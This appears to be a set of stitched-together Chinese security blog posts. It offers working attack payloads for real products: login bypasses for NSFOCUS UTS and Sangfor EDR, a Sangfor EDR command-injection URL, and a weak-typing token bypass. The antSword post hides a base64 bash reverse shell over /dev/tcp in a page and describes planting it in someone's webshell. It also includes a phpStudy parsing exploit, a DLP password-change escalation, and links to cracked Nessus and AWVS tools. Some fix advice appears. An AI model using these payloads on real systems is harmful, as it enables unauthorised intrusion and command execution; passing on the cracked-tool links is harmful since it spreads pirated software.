背景：

绿盟全流量威胁分析解决方案针对原始流量进行采集和监控，对流量信息进行深度还原、存储、查询和分析，可以及时掌握重要信息系统相关网络安全威胁风险，及时检测漏洞、病毒木马、网络攻击情况，及时发现网络安全事件线索，及时通报预警重大网络安全威胁，调查、防范和打击网络攻击等恶意行为，保障重要信息系统的网络安全。

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。

绿盟的邮件回应：

尊敬的客户：

您好！

近日，收到客户反馈我司UTS产品存在“管理员任意登录漏洞”，此漏洞经过内部确认已于2020年8月进行了漏洞修复，并已经联系了受影响客户进行设备升级。现将相关情况说明如下：

此漏洞属于UTS某API存在敏感信息泄露的问题，攻击者可以绕过密码验证登录UTS设备。攻击者利用web特殊请求获取管理员权限，可对设备进行管控，修改防护策略，查看攻击信息和内网地址等资产信息，威胁设备安全。

此问题不是0day漏洞，不会泄露用户明文密码，不存在命令注入漏洞，攻击者无法利用此漏洞跳转攻击其它设备。目前我们已经在UTSV2.0R00F02SP03版本完成修复，升级官网发布的UTSV2.0R00F02SP03/UTSV2.0R00F02SP04升级包均可以解决此问题。同时请客户升级后，及时修改账户密码。

对于不具备升级条件的客户，请联系绿盟技术人员，绿盟技术人员为您提供技术支持进行解决。为您带来的不便，我们深感抱歉。

绿盟科技集团股份有限公司

2020年9月11日

漏洞利用过程：

对响应包进行修改，将false更改为true的时候可以泄露管理用户的md5值密码

利用渠道的md5值去登录页面

替换为 admin密码的md5：

7ac301836522b54afcbbed714534c7fb

成功登录，登录后通过管理员权限对设备进行管控，并且可以看到大量的攻击信息，泄露内部网络地址包括资产管理。

接情报消息，深信服EDR（新）、奇治堡垒机、联软准入、天融信Top-app LB负载均衡及绿盟UTS等设备存在0day漏洞，请各企事业单位根据资产情况，梳理本单位存在以上设备的情况，加强监控，以避免遭受攻击

恶意红队IP：http://d.zaix.ru/ntbv.txt

漏洞原理:

<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/f4561599781522.png" id="ematt:2842"><img src="https://mrxn.net/content/uploadfile/202009/thum-f4561599781522.png" title="点击查看原图" alt="F012EE50-3707-413D-82C6-C9F7718759E9.png" width="600" height="59"></a>
</p>
<p>
    <br></p>
<p>
    dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口
</p>
<p>
    主要调用
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/cede1599781522.png" id="ematt:2844"><img src="https://mrxn.net/content/uploadfile/202009/thum-cede1599781522.png" title="点击查看原图" alt="E8268018-6639-4801-AF13-BB3F0FF6829A.png" width="375" height="300"></a>
</p>
<p>
    <br></p>
<p>
    跟进
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/2ea11599781522.png" id="ematt:2846"><img src="https://mrxn.net/content/uploadfile/202009/thum-2ea11599781522.png" title="点击查看原图" alt="BE3A4B01-2ED7-4CAC-86F2-343DC6D79EBC.png" width="361" height="300"></a>
</p>
<p>
    <br></p>
<p>
    可以看到 第一个检查为  $req_url = $_SERVER['PHP_SELF'];
</p>
<p>
    绕过第一个检查:
</p>
<p>
    在他们系统nginx配置文件里面:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/26021599781522.png" id="ematt:2848"><img src="https://mrxn.net/content/uploadfile/202009/thum-26021599781522.png" title="点击查看原图" alt="CBA339A6-1CB7-4BE2-AF11-3EADD2B5C33D.png" width="354" height="300"></a>
</p>
<p>
    <br></p>
<p>
    通过nginx规则可以得知,他们没有设置禁止外网访问.从而可以直接访问
</p>
<p>
    /api/edr/sangforinter/v2/xxx 绕过 第一个检查
</p>
<p>
    第二检查: 权限检查
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/3f2c1599781523.png" id="ematt:2850"><img src="https://mrxn.net/content/uploadfile/202009/thum-3f2c1599781523.png" title="点击查看原图" alt="F3B31647-71BB-42D6-91CC-09C3F529E61A.png" width="444" height="300"></a>
</p>
<p>
    <br></p>
<p>
    跟进check_access_token
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/36a01599781523.png" id="ematt:2852"><img src="https://mrxn.net/content/uploadfile/202009/thum-36a01599781523.png" title="点击查看原图" alt="5D03BF41-9387-480E-B8F9-ED660ABAD1D4.png" width="419" height="300"></a>
</p>
<p>
    <br></p>
<p>
    这里if($md5_str == $json_token["md5"]) 引发第二个漏洞: php弱类型导致的漏洞
</p>
<p>
    绕过只需要传入一个base64编码的json内容为 {“md5”:true}即可
</p>
<p>
    <br></p>
<p>
    至此 权限检查绕过完毕
</p>
<p>
    来到  process_cssp.php 文件
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/c4241599781523.png" id="ematt:2854"><img src="https://mrxn.net/content/uploadfile/202009/thum-c4241599781523.png" title="点击查看原图" alt="9894AD7B-B9B9-4911-B455-354B4662E43A.png" width="451" height="300"></a>
</p>
<p>
    <br></p>
<p>
    存在任意指令执行漏洞.作者试图使用escapeshellarg函数去给单引号打反斜杠实际上是毫无作用的.
</p>
<p>
    绕过:{"params":"w=123\"'1234123'\"|命令"}
</p>
<p>
    <br></p>
<p>
    结果如下:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/481a1599781523.png" id="ematt:2856"><img src="https://mrxn.net/content/uploadfile/202009/thum-481a1599781523.png" title="点击查看原图" alt="6A999ACE-9B45-4BBD-AC7A-F7675192C15B.png" width="600" height="284"></a>
</p>
<p>
    <br></p>
<p>
    返回:
</p>
<p>
    <a target="_blank" href="https://mrxn.net/content/uploadfile/202009/471b1599781523.png" id="ematt:2858"><img src="https://mrxn.net/content/uploadfile/202009/thum-471b1599781523.png" title="点击查看原图" alt="C798DE63-2AC0-4AC5-B8FF-716924FC7ECB.png" width="600" height="121"></a>
</p>
<p>
    <br></p>
<p>
    <br></p>

HW弹药库之你的蚁剑 shell 还是你的 shell 吗？可能从你的小宝贝变成了小叛徒哦！

——蚁剑 v2.1.8.1 查看站点 cookie html解析未过滤漏洞可反向 RCE

0X0:背景

说来我等菜鸡是不会也没想过去审计这些工具源码，哪怕是开源的，都是拿来主义，大部分看官也是吧。

但是我这个人对于情报搜集特别感兴趣！时常监控一些开源项目或者官网的commit或者更新公告，这不前段时间就看到了芋头师傅（leohearts）提交了一个issue 包含了我的监控关键字 RCE ，

我当时就看了，当时复现了下，但是没有记录，等着 Medicean 师傅修好了我再发，前天，终于修了！距离提交的时间是十一天过后，可能师傅工作比较忙吧！

0X1:复现环节

打开我们的主角-antSword ，在关于程序里面可以看到版本为 v2.1.8.1，下面开始测试，首先在本地PHP环境目录写一个html文件，内容为：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>蚁剑 查看站点 cookie 未过滤致 RCE 测试</h3>
    <script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2IDA+JjEK | base64 -d | bash\")'/>"</script>
</body>
</html>

然后在 antSword 里面添加我们的本地测试URL，密码 连接类型这些随便写，地址写对了就行

添加好了之后，在本地使用 NC 监听 nc -lv 666 因为上面的 base64 编码后的就是反弹 shell 到我们的666端口，不多说，不懂得 Google

然后我们再用 antSword 右键的 查看站点（英文的为 View Site）即可触发获得一个 shell

看一下 Medicean 师傅的 commit 极了可以看到修复的方式是在 cookie 取值的部分添加了 noxss 方法来进行了 XSS 过滤。

0X2:漏洞利用

复现完毕后我就在思考，能不能借此做点小动作？答案是可以的！

想一下，本身是 html格式的URL地址，除了故意这么去复现的查看站点，很少有人拿到shell后去这么干！除非 shell 需要设置 cookie，从 cookie 里取值，这个时候就很容易想到蚁剑的 AES shell 需要设置 cookie ，那就有利用的可能了！

有两种情况，第一种是本身就是 PHP 的 shell ，如果 黑客的 webshell 是使用的 蚁剑的 AES webshell ，基本代码如下：

<?php
@session_start();
$pwd='ant';
[email protected](str_pad(session_id(),16,'a'),0,16);
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
?>

假如黑客 webshell 如上 名为 shell.php ，我们可以把他的 shell 改为如下内容：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>蚁剑 查看站点 cookie 未过滤致 RCE 测试</h3>
    <?php
    @session_start();
    $pwd='ant';
    [email protected](str_pad(session_id(),16,'a'),0,16);
    @eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
    ?>
    <script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2IDA+JjEK | base64 -d | bash\")'/>"</script>
</body>
</html>

直接把他的 shell 改为 html 和 PHP 代码混写！

因为 PHP 本身就可以这么写，而且可以同时执行 PHP 代码和 html 代码。

当然，真实情况下我们要做的隐蔽点 把 没必要的 标题和 H3 这些丢弃。改写后的 shell 如何让黑客再次使用 查看站点 功能来获取 cookie 这是个问题，需要让他原本保存的 cookie 失效，比如重启 PHP 清除缓存 等方法尝试，假设你达成了如上条件，成功清除了 黑客 shell cookie ，那么接下来就是他 连接 shell 发现连接不上，打开 shell 地址发现还在，可能会使用 查看站点的功能来 获取cookie ，就可以顺利的 获得一个反向shell。

测试是在 Mac 环境下测试，可以根据情况修改需要执行的操作，比如直接执行 CS 后门或者 PS下载执行 等等。

0X3:总结

这个漏洞很鸡肋！

其一：需要使用 查看站点功能；

其二：需要让之前的shell cookie 失效；

其三：配合特定的环境，比如解析漏洞或者.htaccess

但是也是一种思路，说不定你就可以借此反日 大黑阔！哈哈哈。各位朋友，使用工具须谨慎！说不定还要未公开的 XXday 等着你上钩呢！最起码 把工作和生活用电脑环境区分开，使用个虚拟机，虚拟机一定要开启自动升级，保持最新版，虚拟机里最好再套两层代理，保护自己，保护大家！

参考连接：

https://github.com/AntSwordProject/antSword/issues/256

https://github.com/AntSwordProject/antSword/commit/0d5b8b7c4f5f9520b0cacb7306beb190efa19881

subdomain_shell

一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令

因为懒 \-_-\ 不想重复写命令，故诞生此项目

暂时只写了个单域名的，后面找时间补上从文件加载多域名脚本 其实加个判断调整下基本上就OK，欢迎各位师傅 pull 啊
后期考虑加上 xray 的主动爬虫 来个简单的从域名到基本信息搜集的过程，可以做成定时任务，再入库？越来越复杂。。。拉闸 暂时先这样

tested on Mac & Ubuntu

食用方法

1.自行下载脚本，准备文件
2.下载我打包好的，下载解压开箱即用点我下载

Mac 脚本测试

运行后自动保存结果

Ubuntu 脚本测试

项目地址：https://github.com/Mr-xn/subdomain_shell 

一、phpStudy(小皮面板)简介：


phpStudy国内12年老牌公益软件，集安全，高效，功能与一体，已获得全球用户认可安装，运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。

二、漏洞简介：

自从2019年phpStudy爆出的后门事件已经过去一段时间了，期间也没有爆出过什么漏洞，并且现在phpStudy(小皮面板)已经改版了，这次爆出的漏洞是nginx的解析漏洞，也就是存在已久的/xx.php解析漏洞

漏洞原理：

1、由于错误配置(但是测试的时候是安装完后的默认配置，我在官方论坛也反馈了，他们还狡辩。。。)导致nginx把以.php结尾的文件交给fastcgi处理,为此可以构造http://www.xxx.com/test.gif/xx.php (任何服务器端不存在的php文件均可,比如a.php)

2、但是fastcgi在处理xx.php文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用于修复路径,如果当前路径不存在则采用上层路径。为此这里交由fastcgi处理的文件就变成了/test.gif。

3、 最重要的一点是php-fpm.conf中的security.limit_extensions配置项限制了fastcgi解析文件的类型(即指定什么类型的文件当做代码解析),此项设置为空的时候才允许fastcgi将.png等文件当做代码解析。
localhost_80.conf原始配置：

location ~ \.php(.*)$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_split_path_info  ^((?U).+\.php)(/?.+)$;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            fastcgi_param  PATH_INFO  $fastcgi_path_info;
            fastcgi_param  PATH_TRANSLATED  $document_root$fastcgi_path_info;
            include        fastcgi_params;
        }

三、漏洞复现：

测试环境：phpStudy(小皮面板)8.1.0.7 + 图片马（一定要注意不是那种copy的马子 有几率失败，可以下载这个马子测试）
复现如图：


执行系统命令：

四、修复
php.ini 中 fix_pathinfo 禁用为0
cgi.fix_pathinfo=0

nginx.conf添加如下代码

location ~ \.php(.*)$ {
      if ( $fastcgi_script_name ~ \..*\/.*php ){
        return 403;
      }

            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_split_path_info  ^((?U).+\.php)(/?.+)$;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            fastcgi_param  PATH_INFO  $fastcgi_path_info;
            fastcgi_param  PATH_TRANSLATED  $document_root$fastcgi_path_info;
            include        fastcgi_params;
        }

请各位师傅下手轻点！注意保重！哈哈哈！

事件起因是我想听的歌曲，在网抑云听不了，我都开了VIP，还是由于版权原因，听不了。。。我难道要每一家都去开vip吗？同时开通每一家的VIP？没那个精力和金钱！那就用路由器搞起来！

 

打开路由器发现解锁音乐的插件是关闭的，我打开后发现没起作用不说，正常的歌曲也打不开了，

打开music.163.com发现证书错误：

 

我这个是由于我前一天没更新插件之前，已经手动替换过证书了可以使用了，当时也是证书错误，提示的是证书过期了。。。

前一天的证书替换过程参考如下：

➜  ~ openssl genrsa -out ca.key 2048
Generating RSA private key, 2048 bit long modulus
..............................+++
..............................................................+++
e is 65537 (0x10001)
➜  ~ openssl req -x509 -new -nodes -key ca.key -sha256 -days 1825 -out ca.crt -subj "/C=CN/CN=UnblockNeteaseMusic Root CA/O=netmusic"
➜  ~ openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus
.....................................+++
.....................+++
e is 65537 (0x10001)
➜  ~ openssl req -new -sha256 -key server.key -out server.csr -subj "/C=CN/L=Hangzhou/O=NetEase (Hangzhou) Network Co., Ltd/OU=IT Dept./CN=*.music.163.com"
➜  ~ openssl x509 -req -extfile <(printf "extendedKeyUsage=serverAuth\nsubjectAltName=DNS:music.163.com,DNS:*.music.163.com") -sha256 -days 365 -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out server.crt
Signature ok
subject=/C=CN/L=Hangzhou/O=NetEase (Hangzhou) Network Co., Ltd/OU=IT Dept./CN=*.music.163.com
Getting CA Private Key
➜  ~ ls
Applications               Public
Applications (Parallels)   Virtual Machines.localized
Desktop                    WeChatExtension-ForMac
Documents                  ca.crt
Downloads                  ca.key
Library                    ca.srl
Movies                     iCloud云盘（归档）
Music                      server.crt
Parallels                  server.csr
Pictures                   server.key
➜  ~ pwd

将server.crt server.key 替换掉,路径如下

[email protected]:~# ls -l /usr/share/UnblockNeteaseMusicGo
-rw-r--r--    1 root     root          1675 Aug 31 13:10 ca.key
-rw-r--r--    1 root     root          1281 Aug 31 13:10 server.crt
-rw-r--r--    1 root     root          1679 Aug 31 13:10 server.key
[email protected]:~#

再把ca.crt 安装到本机并信任就OK。

下面说一下如何更新插件，我是自己编译的插件，已经打包在GitHub仓库了，可以自己下载，链接放在最后。

你可以通过路由后台的文件上传或者是手动使用scp或者其他工具将插件上传到/tmp/目录，然后使用dpkg install 插件包名 来安装更新。我这个固件本身后台有文件上传：

 

 

上传完毕，就可以自行安装了。安装更新后就可以去网易云音乐解锁那个界面下载ca证书，然后本地安装，信任：

 

 

搞定后，打开网易云官网，查看证书，就是我们自己的证书，都OK了





编译备份插件文件列表：

编译时间:2020/09/01
.
├── brcmfmac-firmware-usb_20200619-1_arm_cortex-a9.ipk
├── busybox_1.31.1-2_arm_cortex-a9.ipk
├── ca-certificates_20200601-1_all.ipk
├── coremark_2020-05-28-7685fd32-15_arm_cortex-a9.ipk
├── ddns-scripts_aliyun_1.0.3-1_all.ipk
├── ddns-scripts_dnspod_1.0.2-1_all.ipk
├── default-settings_2-3_all.ipk
├── dns2socks_2.1-1_arm_cortex-a9.ipk
├── dnsmasq-full_2.81-7_arm_cortex-a9.ipk
├── dropbear_2020.80-1_arm_cortex-a9.ipk
├── firewall_2019-11-22-8174814a-1_arm_cortex-a9.ipk
├── getrandom_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── hostapd-common_2020-06-08-5a8b3662-4_arm_cortex-a9.ipk
├── ip-full_5.7.0-2_arm_cortex-a9.ipk
├── ipset_7.4-1_arm_cortex-a9.ipk
├── ipt2socks_1.1.3-1_arm_cortex-a9.ipk
├── iptables-mod-fullconenat_2019-10-21-0cf3b48f-3_arm_cortex-a9.ipk
├── iw_5.4-1_arm_cortex-a9.ipk
├── jshn_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── jsonfilter_2018-02-04-c7e938d6-1_arm_cortex-a9.ipk
├── k3screenctrl_0.10-2_arm_cortex-a9.ipk
├── k3wifi_1-2_arm_cortex-a9.ipk
├── libblobmsg-json_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── libelf1_0.179-1_arm_cortex-a9.ipk
├── libevent2-7_2.1.11-2_arm_cortex-a9.ipk
├── libipset13_7.4-1_arm_cortex-a9.ipk
├── libjson-c4_0.13.1-2_arm_cortex-a9.ipk
├── libjson-script_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── liblua5.1.5_5.1.5-7_arm_cortex-a9.ipk
├── libmbedtls12_2.16.7-1_arm_cortex-a9.ipk
├── libmnl0_1.0.4-2_arm_cortex-a9.ipk
├── libnl-tiny_2019-10-29-0219008c-1_arm_cortex-a9.ipk
├── libopenssl1.1_1.1.1g-1_arm_cortex-a9.ipk
├── libopenssl-conf_1.1.1g-1_arm_cortex-a9.ipk
├── libpcre_8.44-2_arm_cortex-a9.ipk
├── libubox20191228_2020-05-25-66195aee-1_arm_cortex-a9.ipk
├── libubus20191227_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── libubus-lua_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── libuci_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── libuci-lua_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── libuclient20160123_2020-06-17-c6609861-1_arm_cortex-a9.ipk
├── libustream-openssl20200215_2020-03-13-5e1bc342-1_arm_cortex-a9.ipk
├── libuuid1_2.35.1-2_arm_cortex-a9.ipk
├── logd_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── lua_5.1.5-7_arm_cortex-a9.ipk
├── luci-app-accesscontrol_1-11_all.ipk
├── luci-app-arpbind_1-3_all.ipk
├── luci-app-autoreboot_1.0-8_all.ipk
├── luci-app-cpufreq_1-5_all.ipk
├── luci-app-filetransfer_1-2_all.ipk
├── luci-app-ramfree_1.0-1_all.ipk
├── luci-app-sfe_1.0-13_all.ipk
├── luci-app-ttyd_1.0-3_all.ipk
├── luci-app-unblockmusic_2.3.5-9_all.ipk
├── luci-app-vlmcsd_1.0-5_all.ipk
├── luci-app-vsftpd_1.0-3_all.ipk
├── luci-app-webadmin_2-1_all.ipk
├── luci-i18n-accesscontrol-zh-cn_1-11_all.ipk
├── luci-i18n-arpbind-zh-cn_1-3_all.ipk
├── luci-i18n-autoreboot-zh-cn_1.0-8_all.ipk
├── luci-i18n-cpufreq-zh-cn_1-5_all.ipk
├── luci-i18n-filetransfer-zh-cn_1-2_all.ipk
├── luci-i18n-ramfree-zh-cn_1.0-1_all.ipk
├── luci-i18n-sfe-zh-cn_1.0-13_all.ipk
├── luci-i18n-ttyd-zh-cn_1.0-3_all.ipk
├── luci-i18n-unblockmusic-zh-cn_2.3.5-9_all.ipk
├── luci-i18n-vlmcsd-zh-cn_1.0-5_all.ipk
├── luci-i18n-vsftpd-zh-cn_1.0-3_all.ipk
├── luci-i18n-webadmin-zh-cn_2-1_all.ipk
├── luci-lib-fs_1.0-1_all.ipk
├── microsocks_1.0-1_arm_cortex-a9.ipk
├── netifd_2020-06-06-51e9fb81-1_arm_cortex-a9.ipk
├── openssl-util_1.1.1g-1_arm_cortex-a9.ipk
├── openwrt-keyring_2019-07-25-8080ef34-1_arm_cortex-a9.ipk
├── opkg_2020-05-07-f2166a89-1_arm_cortex-a9.ipk
├── Packages
├── Packages.gz
├── Packages.manifest
├── Packages.sig
├── pdnsd-alt_1.2.9b-par-a8e46ccba7b0fa2230d6c42ab6dcd92926f6c21d_arm_cortex-a9.ipk
├── ppp_2.4.8-5_arm_cortex-a9.ipk
├── ppp-mod-pppoe_2.4.8-5_arm_cortex-a9.ipk
├── procd_2020-05-28-b9b39e20-2_arm_cortex-a9.ipk
├── redsocks2_0.67-4_arm_cortex-a9.ipk
├── resolveip_2_arm_cortex-a9.ipk
├── rpcd_2020-05-26-078bb57e-1_arm_cortex-a9.ipk
├── shadowsocksr-libev-alt_2.5.6-5_arm_cortex-a9.ipk
├── shadowsocksr-libev-server_2.5.6-5_arm_cortex-a9.ipk
├── shadowsocksr-libev-ssr-local_2.5.6-5_arm_cortex-a9.ipk
├── shellsync_0.2-2_arm_cortex-a9.ipk
├── simple-obfs_0.0.5-5_arm_cortex-a9.ipk
├── swconfig_12_arm_cortex-a9.ipk
├── trojan_1.16.0-1_arm_cortex-a9.ipk
├── ubox_2019-12-31-0e34af14-4_arm_cortex-a9.ipk
├── ubus_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── ubusd_2020-02-05-171469e3-1_arm_cortex-a9.ipk
├── uci_2018-08-11-4c8b4d6e-2_arm_cortex-a9.ipk
├── uclient-fetch_2020-06-17-c6609861-1_arm_cortex-a9.ipk
├── uhttpd_2020-06-03-939c281c-2_arm_cortex-a9.ipk
├── uhttpd-mod-ubus_2020-06-03-939c281c-2_arm_cortex-a9.ipk
├── UnblockNeteaseMusicGo_0.2.4-1_arm_cortex-a9.ipk
├── urandom-seed_1.0-2_arm_cortex-a9.ipk
├── urngd_2020-01-21-c7f7b6b6-1_arm_cortex-a9.ipk
├── usign_2020-05-23-f1f65026-1_arm_cortex-a9.ipk
├── v2ray_4.27.4-1_arm_cortex-a9.ipk
├── v2ray-plugin_1.4.1-1_arm_cortex-a9.ipk
├── vlmcsd_svn1113-1_arm_cortex-a9.ipk
├── vsftpd-alt_3.0.3-7_arm_cortex-a9.ipk
├── wget_1.20.3-4_arm_cortex-a9.ipk
├── wireless-regdb_2020.04.29-1_all.ipk
├── wol_0.7.1-3_arm_cortex-a9.ipk
├── wpad-basic_2020-06-08-5a8b3662-4_arm_cortex-a9.ipk
└── zlib_1.2.11-3_arm_cortex-a9.ipk

0 directories, 113 files

插件GitHub仓库链接：

https://github.com/Mr-xn/k3_packages_backup

参考链接：

https://netflixcn.com/miji/id-50.html 

https://github.com/nondanee/UnblockNeteaseMusic/

https://github.com/nondanee/UnblockNeteaseMusic/issues/48#issuecomment-477870013

一直都有朋友在留言或者邮件找我，问我是不是 Nessus 新的插件包不能在旧版本使用了，我今天测试了，是可以使用的。还是结合我之前发的哪个版本的，具体的可以看这里：Nessus v8.9.1 系列Windows10上安装激活无IP限制版本 ，今天我测试了下新的插件包：all-2.0(20200825).tar 为例，简单的说下如何使用，

前提：先停止 Nessus 服务，net stop "Tenable Nessus" （需要管理员权限），详细的可以看上面的文章，有说明。

一句话总结：

关闭 Nessus 服务，下载插件包 all-2.0(20200825).tar ，然后解压到一个地方，然后以管理员权限打开命令提示符cmd窗口，使用 copy 命令覆盖替换到 Nessus 的插件包目录，开启 Nessus 服务，打开浏览器，等待重新加载插件即可。

啰嗦的解释：

一般路径为 Nessus 的安装路径下的 Nessus\nessus\plugins ,请自行查看你的安装路径，找到 plugin 目录，复制路径。然后进入到你的 Nessus 安装路径，我的路径是 D:\Nessus\nessus\plugins\,  然后记住解压后的路径，例如解压在 D:\downlods\all-2.0(20200825)\ ，就在 命令行 cd D:\Nessus\nessus\plugins\  回车后，执行：copy D:\downlods\all-2.0(20200825)* ./  /Y

回车后 等待几分钟，文件有点多，十二万三千多个，推荐这种命令行方式复制，图形界面，怕你卡死了....

复制完毕，开启 Nessus 服务。，打开浏览器，等待加载插件完毕即可使用。
 

下面简单说下awvs acunetix_13.0.200807155 windows版本的和谐使用，目前最新版本可以使用的，激活状态如下： 
 

也可以设置中文，路径在 administer-profile-language 选择中文即可，前提是上面要求填写的都需要填写好，然后保存即可。
 

目前只有windows版本的工具 patch4awvs13.0.200715107 可以使用，对于目前最新版的 也适用acunetix_13.0.200807155。

awvs 13.0.200807155 windows下载：Acunetix Windows and Linux 13.0.200807155 and macOS: 13.0.200807156 download now

相关插件包和工具下载：
Nessus 插件包all-2.0(20200825).tar：

https://cloud.189.cn/t/E7Zja27bM32y（访问码：qp4h）

也提供一个我上篇文章的初始版本的插件包all-2.0(20200321).tar：

https://cloud.189.cn/t/nmYzyuZni2ey（访问码：mvj5）
awvs 工具：https://cloud.189.cn/t/a2QRn2FBFJNj（访问码：9hs9）

鉴于大家各种安装错误，我自己在虚拟机全部安装了一遍，做个总结：

1.Nessus 8.9.1 是可以成功安装，并且可以更新到最新插件包：all-2.0_20200828.tar.gz 也是可以扫描的！不要再问重复的问题了,头大。
 

2.Nessus的插件更新还是可以使用这种方法来更新，你可以在安装完毕后，停止Nessus服务直接更新到最新的插件包：
 

3.awvs最新版的acunetix_13.0.200807155 也是可以通过patch4awvs13.0.200715107破解的(貌似没法扫描。。。暂解决).

4.如果安装完毕了之后，打开页面是空白的或者是其他错误，更换下浏览器试试，我测试的机器是chrome最新版，Firefox浏览器有几率打开awvs的页面是空白，推荐统一使用最新版的chrome浏览器。

5.终极大招：我把上述的工具打包成了虚拟机。你实在需要使用，但是自己没有配置安装好的，可以下载使用。
all-2.0_20200828.tar.gz插件下载：

https://cloud.189.cn/t/yUr2qeZra2Ab（访问码：0iic）

https://mega.nz/folder/LRFCiIAC#zIilB3PQU8nrZu4DVEIAQw

虚拟机文件还在上传，上传完毕更新到这里。

parallels desktop 16 ：https://cloud.189.cn/t/Vzy6ZraEZVni（访问码：5njj）

Mac 平台pd虚拟机镜像：https://cloud.189.cn/t/ArQrIfMRnqui（访问码：rno0）

windows vmware可用的镜像：https://cloud.189.cn/t/ui2QvqQ7ZzQz（访问码：dz5d）

Nessus-8.9.1-debian6_amd64.deb下载: https://cloud.189.cn/t/EBju6jVJn6z2 (访问码:zc7w)

宝塔刚刚发布紧急更新：

【紧急更新】宝塔Linux面板 - 8月23日更新 - 7.4.3正式版 

更新日志：
1、紧急修正一处安全风险
此次更新为紧急安全更新，请7.4.2的用户务必更新到最新版。

具体就是在宝塔7.4.2的Linux版本和windows面板 6.8安装了phpmyadmin的鉴权问题（其他版本不影响），导致只需要在phpmyadmin的端口（默认是888）加上/pma/即可访问：
 
请大家赶紧自查！更新！
更新地址：https://www.bt.cn/bbs/thread-54644-1-1.html
详细的漏洞原因，在p牛的公众号有分析说明。
建议一般不用一直开着的服务最好用完即关，养成良好习惯。
再见

HW礼盒，请查收：
深信服edr RCE：
https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可执行命令，

除上面之外，还有任意文件读取，验证码绕过，还有就是rce。
任意用户登录：
注：2020年08月18日，fofa是通杀，版本小于 3.2.19
fofa指纹: title="SANGFOR终端检测响应平台"
payload：target+/ui/login.php?user=admin 即可直接登录：

漏洞剖析：
在源码的：/web/ui/login.php 文件里面
登录判断的代码有一处让人感觉坑爹的地方：



天融信dlp-未授权+越权：

漏洞影响:已知版本号v3.1130.308p3_DLP.1

风险等级:高

漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.

默认用户superman的uid=1

POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

修复==》找官网

奇安信天擎EDR管理服务器远程命令执行RCE漏洞：
漏洞描述:
影响范围:使用奇安信天擎EDR产品的主机
暂时不详
说明:
该漏洞通过深信服SSLVPN进入内网后,利用这类漏洞控制所有装有edr的机器。

深信服 vpn rce 漏洞详情暂时未知

致远OA-A8-V5最新版未授权getshell--七月火师傅暂未公开

通达OA11.6 preauth RCE：
https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/%E9%80%9A%E8%BE%BEOA_v11.6_RCE_EXP.py 

更新日志：

此Acunetix更新在用户界面中引入了中文支持，从而使Acunetix中国用户可以浏览Acunetix用户界面并以其语言读取漏洞数据。新版本显示了扫描站点结构中的路径片段，并引入了针对Rails，SAP NetWeaver，Atlassian JIRA等的新漏洞检查。此外，还有大量的更新和修补程序，所有这些更新和修补程序都可用于Acunetix的所有版本。

新功能

• Acunetix现在提供简体中文版本
• 路径片段现在显示在站点结构中

新的漏洞检查

• 不安全的嵌入式框架的新检查
• 新检查Rails中用户提供的本地名称的远程代码执行
• SAP NetWeaver RECON身份验证绕过漏洞的新检查
• H2控制台的新检查可公开访问
• PHP版本公开的新检查
• Atlassian JIRA ServiceDesk错误配置的新检查
• Jolokia XML外部实体（XXE）漏洞的新测试
• WordPress核心，WordPress主题，WordPress插件，Joomla和Drupal的新检查

更新

• 创建日期和上次更新日期适用于漏洞
• 比较报告中部分的顺序已更新，更加直观
• 目标地址在用户界面中完整显示
• / users /端点现在在API中可用

修正

• 解决了将漏洞导出到包含CVSS3.1的WAF时的问题
